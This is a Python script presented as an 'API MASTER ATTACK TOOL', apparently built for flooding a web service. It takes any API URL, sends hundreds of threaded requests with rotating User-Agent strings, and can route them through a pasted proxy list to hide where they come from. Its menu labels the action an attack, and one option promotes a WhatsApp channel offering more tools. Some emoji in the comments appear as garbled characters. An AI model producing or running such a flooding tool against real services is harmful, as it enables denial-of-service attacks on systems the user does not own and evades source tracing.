import requests
import threading
import random
import time
import os
import sys
import webbrowser

# рҹҺЁ Terminal Colors
GREEN = '\033[92m'
RED = '\033[91m'
CYAN = '\033[96m'
WHITE = '\033[97m'
RESET = '\033[0m'
BOLD = '\033[1m'
DARK_GRAY = '\033[90m'

# рҹ“Ӣ User-Agents
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",
    "Mozilla/5.0 (X11; Linux x86_64)",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X)",
    "Mozilla/5.0 (Linux; Android 10; SM-G973F)"
]

# вҸұпёҸ Settings
TOTAL_REQUESTS = 500
DELAY_BETWEEN_REQUESTS = 0.01
THREAD_COUNT = 20

# рҹ“Ҡ Stats
success_count = 0
failed_count = 0
lock = threading.Lock()

# рҹ–Ҙ Utility functions
def clear():
    os.system("cls" if os.name == "nt" else "clear")

def hacker_logo():
    logo = f"""
{DARK_GRAY}{BOLD}
в–Ҳв–Ҳв•—  в–Ҳв–Ҳв•— в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—  в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв•—  в–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•— 
в–Ҳв–Ҳв•‘ в–Ҳв–Ҳв•”в•қв–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•”в•җв•җв•җв•җв•қв–Ҳв–Ҳв•‘ в–Ҳв–Ҳв•”в•қв–Ҳв–Ҳв•”в•җв•җв•җв•җв•қв–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—
в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қ в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘     в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қ в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—  в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қ
в–Ҳв–Ҳв•”в•җв–Ҳв–Ҳв•— в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘     в–Ҳв–Ҳв•”в•җв–Ҳв–Ҳв•— в–Ҳв–Ҳв•”в•җв•җв•қ  в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—
в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•‘в•ҡв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•‘
в•ҡв•җв•қ  в•ҡв•җв•қв•ҡв•җв•қ  в•ҡв•җв•қ в•ҡв•җв•җв•җв•җв•җв•қв•ҡв•җв•қ  в•ҡв•җв•қв•ҡв•җв•җв•җв•җв•җв•җв•қв•ҡв•җв•қ  в•ҡв•җв•қ
{RESET}
"""
    print(logo)

def loading_bar(message="Fetching Data", duration=2):
    print(f"\n{CYAN}{message}...{RESET}")
    for i in range(0, 101, 5):
        time.sleep(duration / 20)
        sys.stdout.write(f"\r{GREEN}[{'#'* (i//5)}{'-'*(20-i//5)}] {i}%{RESET}")
        sys.stdout.flush()
    print("\n")

# рҹҢҗ Core functions
def send_request(i, api_url, proxies=None):
    global success_count, failed_count
    try:
        headers = {"User-Agent": random.choice(USER_AGENTS)}
        proxy = None
        if proxies:
            selected = random.choice(proxies)
            proxy = {"http": selected, "https": selected}
        res = requests.get(api_url, headers=headers, proxies=proxy, timeout=10)
        with lock:
            success_count += 1
            print(f"{GREEN}[{i}] вң” {res.status_code}{RESET}")
    except Exception as e:
        with lock:
            failed_count += 1
            print(f"{RED}[{i}] вңҳ {e}{RESET}")

def run_stress_test(api_url, use_proxies=False, dynamic_proxies=None):
    global success_count, failed_count
    success_count = 0
    failed_count = 0
    loading_bar("Initializing Attack", 1.5)
    print(f"\n{RED}вҷӢпёҺ Sending {TOTAL_REQUESTS} requests to API: {api_url}{RESET}\n")
    threads = []
    for i in range(1, TOTAL_REQUESTS + 1):
        t = threading.Thread(target=send_request, args=(i, api_url, dynamic_proxies if use_proxies else None))
        t.start()
        threads.append(t)

        if i % THREAD_COUNT == 0:
            for th in threads:
                th.join()
            threads = []
            time.sleep(DELAY_BETWEEN_REQUESTS)

    for t in threads:
        t.join()

    loading_bar("Finalizing Attack", 1)
    print(f"\n{GREEN}вң” Done!{RESET}")
    print(f"{RED}вң” Success: {success_count} | вңҳ Failed: {failed_count}{RESET}")

# рҹ“ң Menu
def menu():
    clear()
    hacker_logo()
    print(f"{GREEN}{BOLD}+{'='*35}+")
    print(f"|{' API MASTER ATTACK TOOL V1.1 ':^35}|")
    print(f"+{'='*35}+{RESET}")
    print(f"{RED}в•ј DEVELOPED BY THE DARK OF MASTERвҳ пёҺ{RESET}\n")
    print(f"{GREEN}> ENTER 1 TO ATTACK ON API")
    print("> ENTER 2 TO ATTACK API WITH PROXY")
    print("> ENTER 3 TO GET MORE TOOLS & JOIN US")
    print("> ENTER 4 TO EXIT TOOL{RESET}")
    choice = input(f"\n{RED}ENTER OPTION (1/2/3/4): {RESET}")
    return choice

# рҹҹў Main
if __name__ == "__main__":
    while True:
        user_choice = menu()
        if user_choice == "1":
            api_url = input(f"\n{GREEN}> рҹ”— ENTER API URL: {RESET}").strip()
            run_stress_test(api_url, use_proxies=False)
            input(f"\n{GREEN}> вҷІпёҺ Press Enter to return to menu...{RESET}")
        elif user_choice == "2":
            api_url = input(f"\n{RED}> рҹ”— ENTER API URL: {RESET}").strip()
            print(f"{GREEN}> вҷІпёҺ ENTER YOUR PROXY LIST (one per line)")
            print("> вңҚ PASTE PROXIES AND PRESS ENTER 2 TIMES")
            proxy_lines = []
            while True:
                line = input()
                if not line.strip():
                    break
                proxy_lines.append(line.strip())
            dynamic_proxies = [proxy for proxy in proxy_lines if proxy]
            if not dynamic_proxies:
                print(f"{RED}вңҳ No valid proxies entered. Returning to menu.{RESET}")
            else:
                run_stress_test(api_url, use_proxies=True, dynamic_proxies=dynamic_proxies)
            input(f"\n{GREEN}вҢ§ Press Enter to return to menu...{RESET}")
        elif user_choice == "3":
            loading_bar("Opening Channel", 1)
            url = "https://whatsapp.com/channel/0029VbAsHR3EquiQSTbSZw2z"
            try:
                if sys.platform.startswith("win"):
                    os.system(f"start {url}")
                elif sys.platform.startswith("linux"):
                    os.system(f"xdg-open {url}")
                elif sys.platform.startswith("darwin"):
                    os.system(f"open {url}")
                else:
                    webbrowser.open(url)
            except Exception as e:
                print(f"{RED}вңҳ Failed to open browser: {e}{RESET}")
            input(f"{GREEN}вҢ§ Press Enter to return to menu...{RESET}")
        elif user_choice == "4":
            print(f"{GREEN}вҳҳ Exiting... Thank you for using the tool!{RESET}")
            sys.exit()
        else:
            print(f"{RED}вңҳ Invalid option! Please select 1, 2, 3, or 4.{RESET}")
            time.sleep(1)
